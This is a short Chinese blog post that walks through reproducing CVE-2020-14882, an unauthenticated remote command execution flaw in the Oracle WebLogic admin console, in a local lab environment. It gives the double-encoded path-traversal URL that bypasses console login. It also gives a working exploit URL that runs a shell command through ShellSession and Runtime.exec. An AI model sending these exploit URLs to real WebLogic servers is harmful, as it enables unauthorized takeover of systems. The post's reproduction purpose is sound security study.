0
点赞
收藏
分享

微信扫一扫

weblogic管理控制台未授权远程命令执行漏洞

年夜雪 2022-04-14 阅读 49

Weblogic

默认端口号:7001

(1)weblogic管理控制台未授权远程命令执行漏洞

CVE-2020-14882

1,拉取环境

2,访问网站

3,启动完成后,访问http://your-ip:7001/console查看管理员控制台登录页面

4,使用此 URL 绕过 Console 组件的身份验证:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal

5,

访问以下 URL 以链接 2 个漏洞并执行以下命令com.tangosol.coherence.mvel2.sh.ShellSession:

http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")

数据包,重放,执行命令

6,写入文件

上传成功

举报

相关推荐

0 条评论